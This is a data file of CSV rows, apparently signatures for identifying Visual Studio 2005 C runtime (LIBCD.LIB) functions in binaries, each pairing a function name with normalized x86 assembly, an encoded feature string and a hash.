+__mbsspnp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",cVqUOuHZBXkAAAAAXqODJ+HZBXkAAAAAXqODJz7KhtkAAAAA4dkFeXfcttheo4MnPsqG2eHZBXkAAAAA4dkFeeHZBXl33LbYXqODJ2wax4MAAAAAd9y22DUWchOxRhSdEIVrf3FalDopV+a8d9y22PhN/Cr4TfwqKVfmvJZz8F+8OPIqsUYUnTUWchNeo4Mny4LLlU+LzAoAAAAA+E38Kg/RU+3/vke7XqODJ2wax4MAAAAANRZyE0QNQ6UAAAAAFJJSQWwax4NxWpQ6/75Hu16jgycP0VPtbBrHg0+LzAoAAAAAvDjyKsuCy5UAAAAAlnPwX8uCy5UAAAAAT4vMCgAAAAAAAAAAD9FT7chSX9deo4MncVqUOhSSUkEAAAAAXqODJ+HZBXkAAAAAyFJf116jgycAAAAARA1DpWwax4NxWpQ6+E38Kl6jgydeo4Mn,[],8c4aa6d06504423e48ce70a79098a6a51ac7fd9f,VS2005,LIBCD.LIB
+_fclose,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",q6rTBZyGUTgWE4iGFhOIhsSg0gkAAAAAKdmrsLdyPo/Zrk+l2a5PpbdyPo8AAAAAt3I+j8Sg0gkAAAAA3mXInCnZq7D0Ke4InIZROORSvJ+S9NEBxKDSCQAAAAAAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTjke5wDkvTRAeRSvJ87j6vl9CnuCLdyPo8AAAAA5HucA7dyPo/eZcic,[],515a4181134dc9c02d01493de776232fa148b5e5,VS2005,LIBCD.LIB
+___wdtoxmode,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",6H4nTAC4vpbofidMuOE2qAC4vpbofidM3XCQ6zkjZBgpwMtpOSNkGAAAAAAAAAAAKcDLab0Ys7opwMtp6H4nTA6V6UwAuL6W4ZlfnDkjZBgpwMtpDpXpTN1wkOshIEElISBBJd1wkOv0Ke4IJxPNneh+J0y44TaoKcDLaTkjZBi9GLO6KcDLab0Ys7opwMtp9CnuCOGZX5wAAAAAALi+lt1wkOsOlelMvRizujkjZBgAAAAAKcDLab0Ys7opwMtp,[],40a163bb2cf75b9987655261e08e3949aad04e6f,VS2005,LIBCD.LIB
+__wstat,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R16,WORD PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nAND R32,CONST\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",l5yO90+LzAoAAAAAzlVWP9qbH7YpwMtpw77gHm+QYHIAAAAA8vQIM8i+xGHopF1ogPTQR0+LzAoAAAAAGGtoP9qbH7Z+RkN0yebY/xnLV9khIEEl2psftoD00Efamx+26KRdaE+LzAoAAAAAiw0UTNqbH7Z+RkN0ISBBJRcQNYUAuL6WKcDLaeikXWjtbek8fkZDdF5m2mHamx+2ALi+lhcQNYXopF1o2psfti3sUUaA9NBH2psftoD00Efamx+2yL7EYZecjvcAAAAA7W3pPOikXWjvpn5A6KRdaE+LzAoAAAAAgPTQR0+LzAoAAAAA2psftsO+4B6A9NBHw77gHosNFEwAAAAAfkZDdBhraD/amx+2FxA1hc5VVj8AAAAA3Te18Mnm2P/opF1o2psftoD00Efamx+276Z+QPL0CDMm+BgpT4vMCgAAAAAAAAAAXmbaYU+LzAoAAAAAgPTQR0+LzAoAAAAALexRRtqbH7Z+RkN0b5Bgck+LzAoAAAAAJvgYKeikXWjy9AgzGctX2dqbH7YpwMtp2psftsO+4B6A9NBH6KRdaE+LzAoAAAAA,[],c072d8dbeaa3256f3c2c2dccad105098ffa0cd08,VS2005,LIBCD.LIB
+__ismbcsymbol,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR DS:[0],CONST\nJCC CONST",MJJdpuB4J1SLDRRMiw0UTOB4J1T0Ke4I9CnuCNUc1LYAAAAAiw0UTOB4J1SLDRRM4HgnVAAAAAAAAAAAiw0UTOB4J1SLDRRM1RzUtgAAAAAAAAAA,[],7f0fc54ff4822d39278ffce382b4d1d40e0e22d0,VS2005,LIBCD.LIB
+__ismbckata,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR DS:[0],CONST\nJCC CONST",iw0UTJZz8F+LDRRM1RzUtgAAAAAAAAAAMJJdppZz8F+LDRRMiw0UTJZz8F/0Ke4I9CnuCNUc1LYAAAAAiw0UTJZz8F+LDRRMlnPwX9Uc1LYAAAAA,[],57da9d596e837e6cbd056ab110fea7284d456905,VS2005,LIBCD.LIB
+__ismbchira,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR DS:[0],CONST\nJCC CONST",1RzUtgAAAAAAAAAAiw0UTJZz8F/0Ke4IMJJdppZz8F+LDRRM9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAAiw0UTJZz8F+LDRRM,[],9561e2233a3469f87c93c92ffe487a7c0a16cb4b,VS2005,LIBCD.LIB
+__mbsnbcat,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nTEST R32,R32\nJCC CONST",BJYM7dUc1LYAAAAAy/6SnV6jgycElgzt7vvadNUc1LYAAAAA1RzUtgAAAAAAAAAAT4vMCgAAAAAAAAAAPsqG2YhCHwwAAAAAiEIfDPYao1h33LbYjLRRTiQDw53LgsuVBJYM7fYao1gAAAAAy4LLlU+LzAoAAAAAXqODJzUWchMAAAAAy/6SnTUWchNeo4Mnd9y22Mv+kp0QDNbAJAPDnfh3+cF2ZN6YdmTemE+LzAoAAAAAEAzWwMv+kp0Elgzt+Hf5wX23yXcAAAAAXqODJ/Yao1gAAAAANRZyE4hCHwwAAAAAfbfJd1mFHuJeo4Mn9hqjWO772nQElgztXqODJ323yXcAAAAAWYUe4ohCHww+yobZBJYM7fYao1gAAAAA,[],236b97e29266c5b1b477039d39c978c4e621c6c7,VS2005,LIBCD.LIB
+__ismbclegal,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSHR R32,CONST\nAND R32,CONST\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]",JfZSY5Zz8F/0Ke4IyCjOVpZz8F8l9lJj9CnuCNUc1LYAAAAA1RzUtgAAAAAAAAAAlnPwX9Uc1LYAAAAA,[],0996add630683b0b6a50565ef9e56f3cb519a44f,VS2005,LIBCD.LIB
+__putch,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R8,BYTE PTR SS:[EBP+CONST]\nMOV BYTE PTR SS:[EBP+CONST],R8\nCMP DWORD PTR DS:[0],-2\nJCC CONST",T4vMCgAAAAAAAAAABIMTg8SSpmiEhv+iJAPDncSSpmiEhv+ixJKmaE+LzAoAAAAAro5/rCQDw50EgxODhIb/otQn+1jEkqZo1Cf7WE+LzAoAAAAA,[],61a86eed382e78a05af52bf8b3cdea2c0c6d1a18,VS2005,LIBCD.LIB
+__wfreopen,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",5FK8n5yGUTjruScgISBBJeRSvJ+S9NEB67knILxmJxSfv+P5vGYnFAAAAAAAAAAAnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8nyEgQSWchlE4kvTRAeRSvJ87j6vlkvTRAeRSvJ87j6vlma5ZK5yGUTgAAAAAkvTRAeRSvJ87j6vlnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4n7/j+bxmJxQAAAAAnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTghIEElkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAA,[],6cc50d4a29f831be066ce0f1f5803efbadf110fa,VS2005,LIBCD.LIB
+_setbuf,"PUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",nIZROOfX/ivqgXAp6oFwKaqT3bIAAAAA59f+K6qT3bIAAAAAs1oPwORSvJ+S9NEBqpPdsgAAAAAAAAAAnIZROORSvJ+S9NEBdYMGr5yGUTichlE45FK8n5yGUTichlE4kvTRAeRSvJ91gwav,[],0398bcb7e9b1e07e2ecf464ee12082068a897fbd,VS2005,LIBCD.LIB
+__wsetlocale,"PUSH CONST\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nXOR R32,R32\nJMP SHORT CONST",ZnkxNU+LzAoAAAAAObf6XvqzpuijLtWqDczAAU+LzAoAAAAAgK138PqzpuhgUfMAYFHzAE+LzAoAAAAAcSt431L7Lrt17KOhkisskSL9N3ANzMABdeyjoU+LzAoAAAAADczAAU+LzAoAAAAAIv03cHEreN8NzMABUvsuu0+LzAoAAAAA+rOm6JIrLJFmeTE1T4vMCgAAAAAAAAAAoy7VqqtV5xcAAAAAq1XnF4Ctd/BmeTE1ZnkxNU+LzAoAAAAA,[],f8f1511cfa2c116e74102ffdc0a3a388e7df697c,VS2005,LIBCD.LIB
+__mbslwr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",DczAAU+LzAoAAAAA1RzUtgAAAAAAAAAAFJJSQdUc1LZ33LbYT4vMCgAAAAAAAAAATYhdRJHw1DwNzMAB7ypQkkQNQ6UAAAAAcmDV8xSSUkEAAAAAd9y22L6C0LFNiF1EyJV12EQNQ6UAAAAA7RHWbsiVddgAAAAARA1DpdUc1LZ33LbYNRZyE0QNQ6UAAAAAXqODJzUWchMAAAAAkfDUPF6jgycAAAAAvoLQse8qUJLtEdZu,[],65142b05555bf9599a3baa78e4b09ba94ed8bfa2,VS2005,LIBCD.LIB
+__ismbcl2,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",LwJyQpZz8F+LDRRMiw0UTJZz8F+LDRRM9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAAMJJdppZz8F8vAnJC1RzUtgAAAAAAAAAAiw0UTJZz8F/0Ke4I,[],2d25822eb1b4ee3493664dd7e457a83a3062f466,VS2005,LIBCD.LIB
+__ismbcl1,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAAiw0UTJZz8F+LDRRM1RzUtgAAAAAAAAAAiw0UTJZz8F/0Ke4IMJJdppZz8F8vAnJCLwJyQpZz8F+LDRRM,[],32f9a0b65d24473b41b19e4681da455c1b919f2f,VS2005,LIBCD.LIB
+__ismbcl0,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",4HgnVAAAAAAAAAAA1RzUtgAAAAAAAAAAMJJdpuB4J1QvAnJCiw0UTOB4J1T0Ke4I9CnuCNUc1LYAAAAALwJyQuB4J1SLDRRM,[],55a8d2242e09fdf122a347f24a7ae740b947f2d7,VS2005,LIBCD.LIB
+__ftbuf,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R8,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",n7/j+cSg0gkAAAAAa11M0+RSvJ+chlE4XqODJ8Sg0gkAAAAA5HucA16jgydmU6LLnIZROORSvJ+chlE4xKDSCQAAAAAAAAAAnIZROORSvJ/b6hIU5HucA8Sg0gmfv+P5dYMGr5yGUTiKdwyY5FK8n5yGUTiKdwyYZlOiy16jgycAAAAA2+oSFORSvJ91gwavincMmOR7nAPke5wD,[],c5edb05c7bf025b0c875032ff343ffdda6c7cc7e,VS2005,LIBCD.LIB
+__stbuf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",t5wE4+RSvJ+S9NEBdb9tVu9qHHNlpU5ciw0UTGZ5MTX0Ke4IZaVOXO9qHHMdJ8/RnIZROORSvJ+S9NEB72occz7qxl0AAAAAdYMGr5yGUTjbajXH5FK8n5yGUTjbajXH9CnuCAZ/IPAAAAAAkvTRAeRSvJ91gwavxKDSCQAAAAAAAAAA22o1x4sNFExmeTE1ZnkxNcSg0gkAAAAAZnkxNcSg0gkAAAAAiw0UTIsNFEz0Ke4IPurGXcSg0gkAAAAA9CnuCAZ/IPAAAAAAZnkxNcSg0gkAAAAAHSfP0T7qxl0AAAAABn8g8HW/bVZmeTE1,[],760a0b170479e85122e78e2879d01dc9077739a1,VS2005,LIBCD.LIB
+__searchenv,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,R32\nCMP R32,CONST\nJCC CONST",0NqBc+772nRAtdah7vvadDUWchMAAAAAnIZROLAro6HNPLdKNRZyE2OmbKgAAAAAXOgAoU+LzAoAAAAAT6vMHGOmbKhc6ACh7vvadE+LzAoAAAAAzv2k8TUWchMyNQfzsCujoTUWchPO/aTxT4vMCgAAAAAAAAAAzTy3SrAro6EAAAAAMjUH80+LzAoAAAAANRZyE0+LzAoAAAAA3kg5bjUWchPu+9p0QLXWobAro6GchlE4Y6ZsqO772nTQ2oFzgDeG6U+rzBzeSDlunIZROLAro6GchlE4,[],ac15043761e5f49610ab8c4d60391dc1a711484b,VS2005,LIBCD.LIB
+_rewind,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",dBTy5v0g7JaFoBiYt5wE4+RSvJ+S9NEBrg0kjz80RpUAAAAAhaAYmAAAAAAAAAAAPzRGlf0g7JaFoBiYnIZROORSvJ+S9NEBdYMGr5yGUThqIhwT5FK8n5yGUThqIhwTkvTRAeRSvJ91gwav/SDslgAAAAAAAAAAaiIcE3QU8uauDSSP,[],16d48c85b102be2fede65a8f08371a86992d4089,VS2005,LIBCD.LIB
+__wfopen,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",HoIHagAAAAAAAAAA,kvTRAeRSvJ91gwavt5wE4+RSvJ+S9NEBkvTRAeRSvJ91gwavxKDSCQAAAAAAAAAAnIZROORSvJ+S9NEB10jyAwAAAAAAAAAAkvTRAeRSvJ91gwav5FK8n5yGUTghIEElnIZROORSvJ+S9NEBDczAAcSg0gkAAAAAdYMGr5yGUTghIEEl5FK8n5yGUTghIEElkvTRAeRSvJ91gwavISBBJeRSvJ+S9NEBeF2amNdI8gMNzMABdYMGr5yGUTghIEEldYMGryEgQSV4XZqY5FK8nyEgQSV4XZqYISBBJeRSvJ+S9NEBdYMGryEgQSWchlE45FK8nyEgQSWchlE4,57ee97c53bb1b938b8abd2719fbed86ea1a7a5bd,VS2005,LIBCD.LIB
+__wfsopen,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",5FK8n5yGUTghIEElISBBJeRSvJ+S9NEBmVConMSg0gkAAAAAkvTRAeRSvJ87j6vlkvTRAeRSvJ91gwavISBBJeRSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8nyEgQSV4XZqYkvTRAeRSvJ87j6vleF2amJlQqJwNzMABxKDSCQAAAAAAAAAA5FK8nyEgQSWchlE4kvTRAeRSvJ87j6vlma5ZK5yGUTgAAAAAnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTghIEEldYMGryEgQSWchlE4nIZROORSvJ+S9NEBDczAAcSg0gkAAAAAO4+r5eRSvJ8AAAAA,[],2bd579941a60b3f5aabc83ca49cb8dba36f81731,VS2005,LIBCD.LIB
+__wcsset,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nTEST R32,R32\nJCC CONST",50yCaiEgQSUAAAAA6EX5tyEgQSUAAAAAISBBJdUc1LbnTIJq1RzUtgAAAAAAAAAA,[],dcbdc37a8cc038e2bfa7c71708091f8c745dbb1a,VS2005,LIBCD.LIB
+__wfindnext,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",cf7B6AAAAAAAAAAAg/KBGcSSpmgAAAAAMhSYrYPygRlx/sHoxJKmaE+LzAoAAAAA+UdSa4mzSUIyFJitT4vMCgAAAAAAAAAAibNJQk+LzAoAAAAA,[],200c62e894114b7258c088d5176c625d6c754dd5,VS2005,LIBCD.LIB
+__wfindfirst,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",cf7B6AAAAAAAAAAAxiy7L+hfpz0yFJitMhSYrYPygRlx/sHorydXXE+LzAoAAAAAg/KBGa8nV1wAAAAA6F+nPU+LzAoAAAAAT4vMCgAAAAAAAAAA,[],589d7a1a953e2e0476aac698a9deb7ad92deebdd,VS2005,LIBCD.LIB
+_strstr,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nPUSH R32\nMOV R8,BYTE PTR DS:[R32]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R8,R8\nJCC CONST",t0SdVFylOYnYzQSmIBY5ggAAAAAAAAAAjmkbnGHqmGleo4MnkK1LnSAWOYJh6php92ZeL2HqmGkAAAAAYeqYaTY9VQQ6XiaGXqODJ7dEnVQAAAAAYeqYaTY9VQSOaRucMuCzKjY9VQQAAAAAQyswNNjNBKYAAAAAXKU5idjNBKb3Zl4vOl4mhrdEnVRh6php2M0EplylOYnYzQSm2M0EpipT1X9DKzA02M0EpkMrMDQqU9V/YeqYaTLgsyq3RJ1UNj1VBAAAAAAAAAAAKlPVfwAAAAAAAAAA,[],c7fd37f4532d9180cd5eeb19af9355257de95855,VS2005,LIBCD.LIB
+__cscanf,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP R32\nPOP R32",5FK8n5yGUThrlL8ya5S/MgAAAAAAAAAAuaShIZyGUTgAAAAAnIZROORSvJ/b6hIU2+oSFORSvJ87j6vlO4+r5eRSvJ8AAAAA,[],6d24b45f258868e17728f2bbebaeb17009f07f3d,VS2005,LIBCD.LIB
+_localeconv,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nPOP EBP\nRETN",YAM74QAAAAAAAAAA,[],6e458b0ca597f920bfca5c36b00650c66ccface6,VS2005,LIBCD.LIB
+__cwait,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",Hhi6OU+LzAoAAAAAvlfU2Hb8+qZxWpQ6cVqUOi7VFRwAAAAAPUrlW0FF0BvxZLvO8WS7zkFF0BsAAAAAVaatKB4YujmchlE4CPcftUFF0BvxZLvOzMUzlXb8+qa+V9TYwIev+Aj3H7UAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROMzFM5UeGLo5dvz6pj1K5VvAh6/4LtUVHEFF0BvxZLvO,[],d46c030f0a9076dfa268d4a94075a9af98b907a8,VS2005,LIBCD.LIB
+___crtGetLocaleInfoA,"MOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nADD CONST2,CONST\nAND R8,CONST\nCALL CONST\nMOV DWORD PTR SS:[EBP+CONST],ESP\nMOV DWORD PTR SS:[EBP+CONST],ESP",6BcFF5yGUTgAAAAAGaZm/yQDw50AAAAAnIZROB3mK+YNzMAB9QbE6KA3OqEAAAAAZnkxNTEuOrEAAAAAJAPDndFIlKVVrii4Va4ouDEuOrEAAAAALaOCjSQDw53fqqWToDc6oTEuOrEAAAAAJu7hZTEuOrEAAAAAMS46sQAAAAAAAAAA0UiUpSbu4WWchlE4DczAATEuOrEAAAAAHeYr5pyGUTgNzMABnIZROOBf4lhzIg5wcyIOcOgXBRdmeTE1ZnkxNTEuOrEAAAAA36qlk9+qpZMZpmb/4F/iWOgXBRdmeTE1DczAATEuOrEAAAAAnIZROPUGxOjEsepTGaZm/yQDw50AAAAAxLHqU6A3OqEAAAAA36qlk2Z5MTUZpmb/,[],01cb2d8ae31290569bb0cfd985bd8ce0675cea18,VS2005,LIBCD.LIB
+___mtold12,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R16,WORD PTR SS:[EBP+CONST]\nSUB CONST6,CONST\nMOV WORD PTR SS:[EBP+CONST],R16\nJMP SHORT CONST",nIZROCnZq7DbNWrXCOgOP5yGUTgAAAAA2zVq1wc7NkEAAAAA5HucA4FB9WCdpuBlBzs2QSnZq7DbNWrXgUH1YAAAAAAAAAAAdXCBUynZq7AAAAAAnabgZeR7nAMAAAAAKdmrsOR7nAN1cIFT,[],864f0f4a942b2e49e48bc3aa6b273a159da71eca,VS2005,LIBCD.LIB
+___shl_12,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nAND R32,CONST\nNEG R32\nSBB R32,R32",kvfBbAAAAAAAAAAA,[],96b098da13d603d498d5da2f474a7b1a688e608d,VS2005,LIBCD.LIB
+___addl,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",g65DXnijv6o+yobZPsqG2Xijv6oAAAAAeKO/qgAAAAAAAAAAe5zrnj7KhtmDrkNe,[],e8196189eec6690cc81ebf382eba3ecb6c4a0373,VS2005,LIBCD.LIB
+___shr_12,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nNEG R32\nSBB R32,R32",mBGEwwAAAAAAAAAA,[],c161f84c95095b7aac6f5d3834cbef5a8bb18a3e,VS2005,LIBCD.LIB
+___add_12,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nPUSH R32\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nCALL CONST",xpLT4gAAAAAAAAAAmfkLzMaS0+I1OUYqNTlGKsaS0+IAAAAAAJAyZJn5C8x2P+3gdj/t4Jn5C8w1OUYqNTlGKpn5C8wAAAAA,[],3319610081a77238efccfc0f1eca0aece05e98f8,VS2005,LIBCD.LIB
+__spawnv,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",s1oPwORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTiDrkNenIZROORSvJ+S9NEBg65DXuRSvJ+S9NEBkvTRAeRSvJ91gwavkvTRAeRSvJ87j6vldYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvO4+r5eRSvJ8AAAAA5FK8n4OuQ17uHaHEpBdjb+RSvJ+S9NEB7h2hxORSvJ+S9NEBkvTRAeRSvJ87j6vlkvTRAeRSvJ87j6vl5FK8n+4docSWKc3rO4+r5eRSvJ8AAAAA5FK8n6QXY2+chlE4O4+r5eRSvJ8AAAAAnIZROORSvJ+S9NEBlinN6wAAAAAAAAAAkvTRAeRSvJ87j6vl,[],96d79e926b99d4bb69e90ae0fbbb0f7a5d8105ac,VS2005,LIBCD.LIB
+___mbtow_environ,"PUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST",duUUZibu4WW1nPgdxJKmaE+LzAoAAAAAxJKmaE+LzAoAAAAAtZz4HUMY4MrEkqZoQxjgyrgCB6vEkqZoer1pqnblFGYAAAAAuAIHq6Jc0ozEkqZoxJKmaE+LzAoAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAolzSjHblFGYAAAAA,[],453c5066486760088fe5f3acef1801c00c19604a,VS2005,LIBCD.LIB
+_mbstowcs,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",O4+r5eRSvJ8AAAAA5FK8n5yGUThpzQYAda1LDcSg0gkAAAAAac0GACQDw50kA8OdXqODJ7ggxvwAAAAAHhi39qA3OqF1rUsN/iJHfMSg0gkAAAAAJAPDncAM8waDrkNeAuh/9H5JIRgeGLo52jcg2sSg0gkAAAAAg65DXsuCy5VoAtYrxKDSCQAAAAAAAAAAHhi6OcSg0gkAAAAAaALWK16d+sTLgsuVXp36xIOuQ14AAAAA85rU58Sg0gkAAAAAfkkhGH0JSDQAAAAAda1LDcSg0gkAAAAAuCDG/B4Yt/bh2QV5y4LLlcSg0gkAAAAAfQlINB4Yt/bh2QV5oDc6ocSg0gkAAAAAJAPDnf88QJ/+Ikd8kvTRAeRSvJ87j6vlZnkxNcSg0gkAAAAA4dkFeR4Yt/Zyxn5e7xfqrZyGUTichlE4y4LLlcSg0gkAAAAAnIZROORSvJ+S9NEBnIZROJyGUThmeTE1csZ+Xl6jgycAAAAAwAzzBgLof/TzmtTn/zxAn9o3INp1rUsN,[],9237a817c6dae91b3b7d66e9aada7c216028c63d,VS2005,LIBCD.LIB
+__wchmod,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",R4CkOU+LzAoAAAAAyFJf1xS1/0wAAAAAR4CkOU+LzAoAAAAAcnVwhFJnfwZHgKQ5wQcNTybu4WVHgKQ5Umd/BsEHDU/IUl/XFLX/TCbu4WVHgKQ5Ju7hZU+LzAoAAAAAT4vMCgAAAAAAAAAA,[],076c78da97200ee5a95dd8e7521caeea7a1c36ec,VS2005,LIBCD.LIB
+__wmktemp,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",P92SQbjhNqgAAAAAxPG3ZedMgmpmADmHO4+r5eRSvJ8AAAAA5FK8n5yGUTghIEElISBBJeRSvJ+S9NEBZgA5h8Sg0gkAAAAAkvTRAeRSvJ87j6vl50yCanTA+HAAAAAA6H4nTA3MwAGchlE4Kd0blcSg0gkAAAAAnIZROJ3p/o4NzMABO4+r5eRSvJ8AAAAA5FK8nyEgQSWrrhq0DczAAcSg0gkAAAAAxKDSCQAAAAAAAAAAq64atCEgQSUAAAAAnen+jsTxt2UkA8OdISBBJbjhNqjIUl/XdZT195yGUTgAAAAAyFJf1yEgQSUAAAAAuOE2qOh+J0ychlE4nIZROORSvJ+S9NEBdMD4cMTxt2UkA8OdkvTRAeRSvJ87j6vlnIZROOh+J0w/3ZJBJAPDnSndG5XE8bdl,[],1aecd4acbb9925c7204464619871240564c409f5,VS2005,LIBCD.LIB
